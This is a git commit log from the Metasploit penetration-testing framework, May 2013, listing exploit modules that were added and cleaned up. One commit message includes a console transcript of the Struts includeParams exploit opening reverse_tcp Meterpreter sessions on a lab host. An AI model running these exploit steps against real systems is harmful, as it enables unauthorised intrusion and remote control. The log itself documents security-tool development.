sinn3r
90117c322c
Landing #1874 - Post API cleanup
2013-05-31 16:15:23 -05:00
James Lee
4f6d80c813
Land #1804 , user-settable filename for psexec
2013-05-31 13:34:52 -05:00
James Lee
5964d36c40
Fix a syntax error
...
Also uses a prettier syntax for setting the filename (ternary operators
are hard to read).
2013-05-31 13:31:36 -05:00
jvazquez-r7
146a30ec4d
Do minor cleanup for struts_include_params
2013-05-31 01:01:15 -05:00
jvazquez-r7
a7a754ae1f
Land #1870 , @Console exploit for Struts includeParams injection
2013-05-31 00:59:33 -05:00
jvazquez-r7
d0489b5d1e
Delete some commas
2013-05-30 14:25:53 -05:00
jvazquez-r7
6abb591428
Do minor cleanup for lianja_db_net
2013-05-30 14:25:05 -05:00
jvazquez-r7
38e5c2bed2
Land #1877 , @zeroSteiner's exploit for Lianja SQL
2013-05-30 14:23:45 -05:00
Console
eb4162d41b
boolean issue fix
2013-05-30 18:15:33 +01:00
Console
5fa8ecd334
removed magic number 109
...
now calculated from the actual length of all static URL elements
2013-05-30 17:40:43 +01:00
Spencer McIntyre
70e1379338
Use msvcrt in ropdb for stability.
2013-05-30 11:13:22 -04:00
Console
47524a0570
converted request params to hash merge operation
2013-05-30 15:36:01 +01:00
Console
51879ab9c7
removed unnecessary lines
2013-05-30 15:15:10 +01:00
Console
abb0ab12f6
Fix msftidy compliance
2013-05-30 13:10:24 +01:00
Console
5233ac4cbd
Progress bar instead of message spam.
2013-05-30 13:08:43 +01:00
Console
fb388c6463
Chunk length is now "huge" for POST method
...
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
Console
ab6a2a049b
Fix issue with JAVA meterpreter failing to work.
...
Was down to the chunk length not being set correctly.
Still need to test against windows.
```
msf exploit(struts_include_params) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Universal
1 Linux Universal
2 Java Universal
msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
Console
d70526f4cc
Renamed as per suggestion
2013-05-30 09:29:26 +01:00
Tod Beardsley
e7a1f06fbc
Modules shouldn't be +x
2013-05-29 15:11:35 -05:00
Console
7c38324b76
Considered using the bourne stager.
...
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
Spencer McIntyre
c3ab1ed2a5
Exploit module for Lianja SQL 1.0.0RC5.1
2013-05-29 08:48:41 -04:00
Console
ec315ad50d
Modified URI handling to make use of target_uri and vars_get/post.
...
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
Console
b39531cea6
Added references
2013-05-28 23:15:10 +01:00
James Lee
f3ff5b5205
Factorize and remove includes
...
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
Console
7b43117d87
Added RCE for Struts versions earlier than 2.3.14.2
...
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
2013-05-28 18:26:57 +01:00
James Lee
9843dc4cb4
Land #1708 , android meterpreter
...
Conflicts:
data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
sinn3r
d16d316658
Fixes mssql_findandsampledata & ms11_006_creat esizeddibsection
...
[FixRM:7987]
[FixRM:7986]
2013-05-28 11:15:17 -05:00
sinn3r
73aa14cb91
Landing #1868 - IBM SPSS SamplePower 3.0 module (CVE-2012-5946)
2013-05-28 11:02:21 -05:00
Tod Beardsley
75d6c8079a
Spelling, whitespace
...
Please be sure to run msftidy.rb on new modules. Thanks!
2013-05-28 10:03:37 -05:00
jvazquez-r7
e678b2c5d8
Add module for CVE-2012-5946
2013-05-26 00:21:20 -05:00
darknight007
57b7e4ec44
Update ms11_006_createsizeddibsection.rb
2013-05-25 13:14:41 +06:00
sinn3r
81ad280107
Landing #1856 - CVE-2013-0758 Firefox <= 17.0.1 + Flash RCE
...
Chained exploit using CVE-2013-0758 and CVE-2013-0757
2013-05-23 12:21:10 -05:00
sinn3r
67861794f6
Fix automatic payload selection
2013-05-22 22:37:18 -05:00
sinn3r
23fe3146dc
Extra print_status I don't want
2013-05-22 14:38:30 -05:00
jvazquez-r7
bfcd86022d
Add code cleanup for nginx_chunked_size.
2013-05-22 14:37:42 -05:00
sinn3r
0e6576747a
Fix target selection probs, and swf path
2013-05-22 14:34:00 -05:00
LinuxGeek247
81b690ae4b
Initial check in of nginx module
2013-05-22 13:52:00 -04:00
sinn3r
ecb9d1d7fa
Landing #1848 - AdobeCollabSync Buffer Overflow on Adobe Reader X
2013-05-22 12:24:42 -05:00
Joe Vennix
aae4768563
Fix whitespace issues from msftidy.
2013-05-21 14:31:36 -05:00
Joe Vennix
eaeb10742a
Add some comments and clean some things up.
2013-05-21 14:01:14 -05:00
Joe Vennix
978aafcb16
Add DEBUG option, pass args to .encoded_exe().
2013-05-21 14:01:14 -05:00
Joe Vennix
ee8a97419c
Add some debug print calls to investigate Auto platform selection.
2013-05-21 14:01:13 -05:00
Joe Vennix
60fdf48535
Use renegerate_payload(cli, ...).
2013-05-21 14:01:13 -05:00
jvazquez-r7
53cb493bc9
Fix @jlee-r7's feedback
2013-05-20 18:44:21 -05:00
James Lee
f4498c3916
Remove $Id tags
...
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
jvazquez-r7
94bc3bf8eb
Fix msftidy warning
2013-05-20 10:35:59 -05:00
jvazquez-r7
395aac90c2
Do minor cleanup for linksys_wrt160nv2_apply_exec
2013-05-20 10:34:39 -05:00
jvazquez-r7
08b2c9db1e
Land #1801 , @m-1-k-3's linksys wrt160n exploit
2013-05-20 10:33:44 -05:00
m-1-k-3
1a904ccf7d
tftp download
2013-05-19 20:37:46 +02:00
jvazquez-r7
dfa19cb46d
Do minor cleanup for dlink_dir615_up_exec
2013-05-19 12:43:01 -05:00